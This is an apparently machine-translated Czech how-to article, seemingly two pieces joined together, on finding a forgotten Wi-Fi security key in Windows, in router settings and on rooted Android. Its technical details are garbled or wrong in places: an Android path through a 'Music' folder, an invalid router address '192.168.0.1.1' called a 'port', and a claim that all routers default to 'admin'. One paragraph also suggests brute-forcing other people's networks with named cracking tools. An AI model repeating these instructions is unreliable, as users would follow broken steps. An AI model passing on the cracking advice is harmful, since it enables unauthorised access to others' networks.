    Pojem klíč zároveň nijak nesouvisí s typem použitého šifrování, ale odkazuje konkrétně na poskytování zabezpečeného záznamu. Jak již mnozí pravděpodobně uhodli, otázka, co je síťový bezpečnostní klíč, má jedinou správnou odpověď: toto je nejběžnější přístupové heslo, které se zadává na vyžádání z routeru. Může se skládat z libovolné sady latinských písmen, čísel a symbolů.

    Jak to funguje?

    V otázce, co je síťový bezpečnostní klíč, nelze ignorovat některé aspekty související s tím, jak funguje. Faktem je, že požadavek nepřichází ze samotné bezdrátové sítě, ale z použitého routeru (router nebo ADSL modem).

    Když se pokusíte připojit k síti definované vaším počítačem, notebookem nebo mobilním zařízením, ze zařízení se odešle požadavek a přihlásí se do routeru. Ten zase zajišťuje bezpečnost bezdrátových sítí a dává vám jakousi výzvu k připojení, ovšem s povinným potvrzením přístupového hesla, které ve většině případů, kromě použití programů umožňujících výpočet klíče, poskytuje ochrana před neoprávněným připojením. U programů se zastavíme o něco později, ale zatím se podívejme, jak takové heslo zjistíte v různé systémy a dál různá zařízení.

    Jak zjistit klíč zabezpečení sítě ve Windows?

    A nejprve se podívejme na desktopové operační systémy Windows ve vztahu k uživatelům, kteří z nějakého důvodu zapomněli nebo ztratili svá přístupová hesla k Wi-Fi. Co dělat, když se počítač nebo notebook bez problémů připojí k síti, ale potřebujete k němu přistupovat z jiného zařízení (například z mobilního zařízení). Kde mohu získat klíč zabezpečení sítě? Tento problém vyřešeno zcela jednoduše.

    Nejprve musíte jít do vlastností navázané spojení k tomu použijte "Centrum sítí a řízení". veřejný přístup". Můžete jej vyvolat buď přes nabídku RMB na ikoně připojení, nebo přejít do příslušné sekce přes "Ovládací panely". Okno vlastností používá kartu zabezpečení, která obsahuje název sítě a heslo. Zobrazuje se ale pouze jako tečky. Jak najít klíč zabezpečení sítě? Ano, stačí zaškrtnout políčko u položky pro zobrazení vámi zadaných znaků a heslo se vám objeví před očima.

    Proč se tohle děje? Ano, pouze proto, že jakýkoli operační systém i při jednorázovém připojení ukládá názvy sítí, které zadáte, a heslo k nim, nemluvě o připojení, které se používá standardně.

    Získání klíče na routeru

    V zásadě platí, že pokud tato možnost uživateli s něčím nevyhovuje, můžete se vydat delší cestou pomocí webového rozhraní routeru. Chcete-li to provést, musíte zadat nastavení prostřednictvím libovolného webového prohlížeče zadáním kombinací začínajících na 192.168, poté se přidá buď 0,1 nebo 1,1 (u nestandardních modelů routerů se adresy mohou značně lišit).

    Poté přejděte do sekce bezdrátové připojení(Bezdrátové) a poté v podsekci Zabezpečení najděte pole označené PSK. To, co je v něm napsáno, je požadovaný klíč. Pokud z nějakého důvodu nemůžete zadat nastavení routeru, příkazový řádek zadejte kombinaci ipconfig a podívejte se do pole výchozí brány. Toto je adresa samotného routeru.

    Určení bezpečnostního klíče v systému Android

    Co je klíč zabezpečení sítě a jak jej najít v systému Windows, bylo zjištěno. Nyní se podívejme, jak provádět podobné postupy mobilní systémy Android. Zde je vše poněkud složitější.

    Pokud se heslo nezobrazí v normální forma v nastavení připojení, budete to muset hledat v systémové soubory, ale pro přístup k nim na zařízení musíte mít Kořenová práva a jakékoli správce souborů. Ve správci postupně procházejte adresáře Data / Hudba / WiFi a v druhém otevřete Textový dokument s názvem wpa_supplicant.conf, pak v textu najděte název hledané sítě. Vedle názvu bude zadán odpovídající klíč.

    Použití specializovaných programů

    V mobilních systémech můžete použít bezplatný nástroj WiFi Password Hacker, který po spuštění prohledá všechna dosud vytvořená připojení a po výběru požadovanou síť zobrazí na obrazovce použité přístupové heslo.

    Pokud potřebujete zjistit heslo do cizí sítě, budete muset použít poněkud nelegální techniku ​​zvanou hrubá síla. Pro systémy Windows je nejpřijatelnější utilita Aircrack-ng a pro systémy Android WIBR. Jejich použití je celkem jednoduché, takže nemá smysl se na to zaměřovat. Mějte ale na paměti, že jejich použití, pokud není nelegální, je přinejmenším za hranicí slušnosti.

    Místo celkové

    To je vše, co se týká zvážení otázek souvisejících s konceptem bezpečnostního klíče. Ohledně samotného konceptu lze vyvodit jediný závěr – jedná se o nejčastější přístupové heslo. Pokud jde o to, jak to rozpoznat, zdá se, že by neměly existovat žádné zvláštní otázky, protože se to dělá docela jednoduše v jakémkoli operačním systému. S mobilní zařízení pokud nejsou přístupová práva k systémovým adresářům, mohou nastat problémy, nicméně pro získání příslušných práv lze použít například počítačovou utilitu Kingo Root, která se nejprve nainstaluje do PC a poté nainstaluje vlastní ovladač na mobilní zařízení, po kterém budete mít práva superuživatele.

    Pokud jste zapomněli heslo k bezdrátové síti, ke které jste připojeni tento moment, pak jej můžete snadno najít v počítači bez stahování software třetí strany. Tato situace se často vyskytuje, když k vám přijdou hosté a požádají vás, abyste použili síť Wi-Fi, a vy jste ji připojili tak dávno, že jste zapomněli všechna hesla. Pokud máte operační systém Windows pak dostanete dva další způsoby Naučte se klíč zabezpečení sítě prostřednictvím počítače. V jiných situacích je lepší jej zobrazit v prohlížeči prostřednictvím nastavení routeru. Podívejte se na všechny možnosti v tomto článku a vyberte si tu, která vám nejvíce vyhovuje.

    Jak zjistit klíč zabezpečení sítě v systému Windows

    Tento operační systém je poměrně flexibilní, takže můžete snadno vidět hesla a klíče, které jste sami zadali. Stačí mít přístup k počítači, který je připojen k síti Wi-Fi.

    Jak zjistit klíč zabezpečení sítě prostřednictvím panelu počítače

    • Nejrychlejší způsob, jak zjistit heslo k WiFi. Stačí v počítači vyhledat ikonu síťové lišty. Nachází se vedle data a času, může vypadat jako anténa nebo znak sítě na telefonu.
    • Vyberte síť, ze které chcete získat heslo. Váš počítač k němu musí být připojen.
      Klikněte pravým tlačítkem na jeho název.
    • V zobrazeném seznamu vyberte "Vlastnosti".


    • Otevře se okno obsahující vaše heslo. Ve výchozím nastavení jsou znaky hesla chráněny nastavením zobrazení. Heslo zobrazíte zaškrtnutím políčka vedle slov „Zobrazit zadané znaky“.


    Jak zjistit klíč zabezpečení sítě prostřednictvím centra sdílení sítě

    Pokud z jakéhokoli důvodu nemůžete zjistit heslo předchozím způsobem. Pak se můžete do okna vlastností této sítě dostat jiným způsobem.

    • Otevřete panel počítače a znovu klikněte na ikonu sítě. Klikněte na odkaz "Centrum sítí a sdílení".


    • Zde uvidíte připojenou bezdrátovou síť, musíte následovat odkaz uprostřed okna.


    • V okně, které se zobrazí, vyberte pole „Vlastnosti bezdrátové sítě“.


    • Nyní přejděte na kartu Zabezpečení.


    • Ocitli jste se v již známém okně s heslem z Wi-Fi připojení. Zaškrtnutím políčka zobrazíte symboly a zjistíte klíč bezdrátové sítě.


    Jak zjistit klíč zabezpečení sítě prostřednictvím nastavení routeru

    Tato možnost je vhodná pro každého operační systémy, protože pracujete přímo s routerem.

    • Přes prohlížeč můžete přejít do nastavení routeru nebo routeru. Do adresního řádku stačí zadat následující port: 192.168.0.1 nebo 192.168.0.1.1
    • Heslo a přihlašovací jméno pro všechny routery je ve výchozím nastavení „admin“ bez uvozovek. Pokud jste toto nastavení změnili, zadejte své uživatelské jméno a heslo.


    • V nabídce vyberte „Bezdrátový režim“.


    • Nyní přejděte na kartu „Zabezpečení bezdrátového připojení“.
    • Zde je heslo pro síť Wi-Fi v položce „Heslo bezdrátové sítě“. Zapište si ho a uschovejte na bezpečném místě, abyste na něj znovu nezapomněli.